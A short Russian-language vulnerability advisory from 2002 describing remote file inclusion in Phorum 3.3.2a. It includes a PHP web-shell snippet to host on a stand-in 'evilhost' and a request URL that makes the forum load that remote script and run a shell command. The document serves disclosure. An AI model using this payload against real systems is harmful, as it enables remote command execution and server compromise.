Security Lab

Выполнение произвольного кода и команд в Phorum

Дата публикации:20.05.2002
Всего просмотров:4697
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Phorum - приложение программного обеспечения форума, написанное в php. Недостаток защиты в программе позволяет удаленным пользователям включать внешние php сценарии и выполнять произвольный код и команды. Пример: Создаем файл replace.php на сайте evilhost:
<?
echo("<?
system(\"\$cmd\");
?>");
?> 
Если PHP не поддерживается, то вносим:
<?
system("$cmd");
?>
Затем:
http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls
выполнит команду Ls на уязвимом сайте.

Уязвимость обнаружена в Phorum version 3.3.2a

Ссылки: Phorum Remote Command Execution Vulnerability (PHORUM[settings_dir])